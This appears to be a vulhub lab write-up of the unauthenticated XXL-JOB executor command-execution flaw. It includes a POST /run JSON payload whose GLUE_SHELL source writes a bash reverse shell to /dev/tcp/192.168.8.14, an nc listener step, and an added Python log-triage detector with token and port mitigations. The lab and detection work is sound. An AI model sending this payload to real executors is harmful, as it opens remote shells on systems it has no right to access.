1. Vulnerability description
XXL-JOB is a distributed task scheduling platform whose core design goals are rapid development, a gentle learning curve, a lightweight footprint, and easy extension. Its source code is open and it runs in the production lines of many companies out of the box. XXL-JOB has two parts: the admin (the backend management web UI) and the executor (the client that actually runs tasks). The executor has no authentication configured by default, so an unauthenticated attacker can execute arbitrary commands through its RESTful API.
2. Lab environment setup
The lab environment uses vulhub. Enter the vulhub/xxl-job/unacc directory and run docker-compose up -d to start the container; docker ps -a shows it running.
Open http://your-ip:9999 in the browser. When the page shown in the screenshot appears, the vulnerable environment has been deployed successfully.
3. Vulnerability reproduction (reverse shell)
Open http://your-ip:9999/run in the browser and capture the request with Burp Suite (bp). Change the request method to POST, put the exp below in the request, and send it.
exp:
{
"jobId": 1,
"executorHandler": "demoJobHandler",
"executorParams": "demoJobHandler",
"executorBlockStrategy": "COVER_EARLY",
"executorTimeout": 0,
"logId": 1,
"logDateTime": 1586629003729,
"glueType": "GLUE_SHELL",
"glueSource": "echo 'bash -i >& /dev/tcp/192.168.8.14/9999 0>&1' > /tmp/1.sh",
"glueUpdatetime": 1586699003758,
"broadcastIndex": 0,
"broadcastTotal": 0
}
Grant /tmp/1.sh executable permission and start an nc listener.
Execute command:
Check the nc listener: the connection came back, so the reverse shell succeeded.
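For the defending side, the request above is easy to spot in proxy or WAF logs: an unauthenticated POST to the executor's /run endpoint whose body carries a script glueType and an inline glueSource. The following is an added detection example, not code from the page or the XXL-JOB project; it assumes request records already parsed into dicts, the XXL-JOB-ACCESS-TOKEN header that executors check once xxl.job.accessToken is configured (not mentioned on this page), and constructed sample requests.

```python
import json

# Constructed sample request records (method, path, headers, body) in the shape a
# reverse proxy or WAF might export. Not real traffic; the glueSource is harmless.
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/run",
     "headers": {"Content-Type": "application/json"},
     "body": json.dumps({"jobId": 1, "executorHandler": "demoJobHandler",
                         "glueType": "GLUE_SHELL",
                         "glueSource": "echo hello > /tmp/x.sh"})},
    {"method": "POST", "path": "/run",
     "headers": {"Content-Type": "application/json",
                 "XXL-JOB-ACCESS-TOKEN": "placeholder-token"},
     "body": json.dumps({"jobId": 2, "executorHandler": "demoJobHandler",
                         "glueType": "BEAN", "glueSource": ""})},
    {"method": "GET", "path": "/run", "headers": {}, "body": ""},
]

# Glue types whose glueSource is an inline script the executor runs. GLUE_SHELL is the
# one used on this page; the rest come from XXL-JOB's GlueTypeEnum (assumption).
SCRIPT_GLUE_TYPES = {"GLUE_SHELL", "GLUE_PYTHON", "GLUE_POWERSHELL",
                     "GLUE_NODEJS", "GLUE_PHP", "GLUE_GROOVY"}

# Header the executor validates when xxl.job.accessToken is set (assumption, not on page).
TOKEN_HEADER = "XXL-JOB-ACCESS-TOKEN"


def triage_request(req):
    """Return a list of finding strings for one request record (empty = nothing to flag)."""
    findings = []
    if req["method"] != "POST" or req["path"] != "/run":
        return findings
    if not req["headers"].get(TOKEN_HEADER):
        findings.append("POST /run without access token: executor reachable unauthenticated")
    try:
        body = json.loads(req["body"] or "{}")
    except json.JSONDecodeError:
        findings.append("POST /run with non-JSON body")
        return findings
    glue_type = body.get("glueType")
    if glue_type in SCRIPT_GLUE_TYPES and body.get("glueSource"):
        findings.append(f"glueType={glue_type} with inline glueSource: caller-supplied script")
    return findings


def scan(requests):
    """Return (index, findings) for every request that produced at least one finding."""
    results = []
    for idx, req in enumerate(requests):
        findings = triage_request(req)
        if findings:
            results.append((idx, findings))
    return results
```

The fix on the executor side is to set the same non-empty xxl.job.accessToken in both the admin and executor configuration and to restrict the executor port to the admin hosts, so that requests like the first sample are rejected before any glue code runs.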